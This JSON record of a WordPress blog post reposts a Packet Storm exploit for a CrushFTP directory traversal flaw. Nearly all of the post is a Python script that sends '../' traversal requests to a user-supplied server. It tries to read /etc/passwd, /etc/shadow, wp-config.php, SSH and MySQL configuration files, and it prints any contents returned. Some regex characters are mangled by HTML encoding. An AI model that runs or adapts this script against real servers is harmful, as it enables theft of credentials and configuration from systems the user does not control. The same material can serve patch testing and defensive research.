{"id":56831,"date":"2024-05-14T19:50:17","date_gmt":"2024-05-14T15:50:17","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178565\/crushftp-traversal.txt"},"modified":"2024-05-14T19:50:17","modified_gmt":"2024-05-14T15:50:17","slug":"crushftp-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/crushftp-directory-traversal\/","title":{"rendered":"CrushFTP Directory Traversal"},"content":{"rendered":"<p>## Exploit Title: CrushFTP Directory Traversal<br \/>## Google Dork: N\/A<br \/># Date: 2024-04-30<br \/># Exploit Author: Abdualhadi khalifa (https:\/\/twitter.com\/absholi_ly)<br \/>## Vendor Homepage: https:\/\/www.crushftp.com\/<br \/>## Software Link: https:\/\/www.crushftp.com\/download\/<br \/>## Version: below 10.7.1 and below 11.1.0 (as well as legacy 9.x)<br \/>## Tested on: Windows 10<\/p>\n<p>import requests<br \/>import re<\/p>\n<p># Regular expression to validate the URL<br \/>def is_valid_url(url):<br \/>regex = re.compile(<br \/>r&#8217;^(?:http|ftp)s?:\/\/&#8217; # http:\/\/ or https:\/\/<br \/>r'(?:(?:A-Z0-9?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|&#8217; # domain&#8230;<br \/>r&#8217;localhost|&#8217; # localhost&#8230;<br \/>r&#8217;\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}|&#8217; # &#8230;or ipv4<br \/>r&#8217;\\[?[A-F0-9]*:[A-F0-9:]+\\]?)&#8217; # &#8230;or ipv6<br \/>r'(?::\\d+)?&#8217; # optional: port<br \/>r'(?:\/?|[\/?]\\S+)$&#8217;, re.IGNORECASE)<br \/>return re.match(regex, url) is not None<\/p>\n<p># Function to scan for the vulnerability<br \/>def scan_for_vulnerability(url, target_files):<br \/>print(&#8220;Scanning for vulnerability in the following files:&#8221;)<br \/>for target_file in target_files:<br \/>print(target_file)<\/p>\n<p>for target_file in target_files:<br \/>try:<br \/>response = requests.get(url + &#8220;?\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/&#8221; + target_file, timeout=10)<br \/>if response.status_code == 200 and target_file.split(&#8216;\/&#8217;)[-1] in 
response.text:<br \/>print(&#8220;vulnerability detected in file&#8221;, target_file)<br \/>print(&#8220;Content of file&#8221;, target_file, &#8220;:&#8221;)<br \/>print(response.text)<br \/>else:<br \/>print(&#8220;vulnerability not detected or unexpected response for file&#8221;, target_file)<br \/>except requests.exceptions.RequestException as e:<br \/>print(&#8220;Error connecting to the server:&#8221;, e)<\/p>\n<p># User input<br \/>input_url = input(&#8220;Enter the URL of the CrushFTP server: &#8220;)<\/p>\n<p># Validate the URL<br \/>if is_valid_url(input_url):<br \/># Expanded list of allowed files<br \/>target_files = [<br \/>&#8220;\/var\/www\/html\/index.php&#8221;,<br \/>&#8220;\/var\/www\/html\/wp-config.php&#8221;,<br \/>&#8220;\/etc\/passwd&#8221;,<br \/>&#8220;\/etc\/shadow&#8221;,<br \/>&#8220;\/etc\/hosts&#8221;,<br \/>&#8220;\/etc\/ssh\/sshd_config&#8221;,<br \/>&#8220;\/etc\/mysql\/my.cnf&#8221;,<br \/># Add more files as needed<\/p>\n<p>]# Start the scan<br \/>scan_for_vulnerability(input_url, target_files)<br \/>else:<br \/>print(&#8220;Invalid URL entered. 
Please enter a valid URL.&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Exploit Title: CrushFTP Directory Traversal## Google Dork: N\/A# Date: 2024-04-30# Exploit Author: [Abdualhadi khalifa (https:\/\/twitter.com\/absholi_ly)## Vendor Homepage: https:\/\/www.crushftp.com\/## Software Link: https:\/\/www.crushftp.com\/download\/## Version: below 10.7.1 and 11.1.0 (as well as legacy 9.x)## Tested on: Windows10 import requestsimport re # Regular expression to validate the URLdef is_valid_url(url):regex = re.compile(r&#8217;^(?:http|ftp)s?:\/\/&#8217; # http:\/\/ or https:\/\/r'(?:(?:A-Z0-9?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|&#8217; # domain&#8230;r&#8217;localhost|&#8217; # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56831","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56831"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56831\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post
=56831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}